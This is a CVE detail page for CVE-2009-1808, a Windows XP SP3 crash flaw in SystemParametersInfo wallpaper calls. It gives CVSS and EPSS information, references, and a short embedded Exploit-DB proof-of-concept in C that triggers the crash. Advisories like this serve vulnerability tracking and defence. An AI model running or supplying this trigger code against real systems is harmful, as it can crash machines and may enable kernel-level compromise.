CVE-2009-1808 : Detail

CVE-2009-1808

1%V4
Local
2009-05-28
18h14 +00:00
2017-08-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Microsoft Windows XP SP3 allows local users to cause a denial of service (system crash) by making an SPI_SETDESKWALLPAPER SystemParametersInfo call with an improperly terminated pvParam argument, followed by an SPI_GETDESKWALLPAPER SystemParametersInfo call.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 33012

Publication date : 2009-02-01 23h00 +00:00
Author : Arkon
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/35120/info Microsoft Windows is prone to a local privilege-escalation vulnerability. Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. #include <windows.h> int main() { WCHAR c[1000] = {0}; memset(c, �c�, 1000); SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0); WCHAR b[1000] = {0}; SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0); return 0; }

Products Mentioned

Configuraton 0

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

    References

    http://www.securityfocus.com/bid/35120
    Tags : vdb-entry, x_refsource_BID
    http://www.securitytracker.com/id?1022330
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/35323
    Tags : third-party-advisory, x_refsource_SECUNIA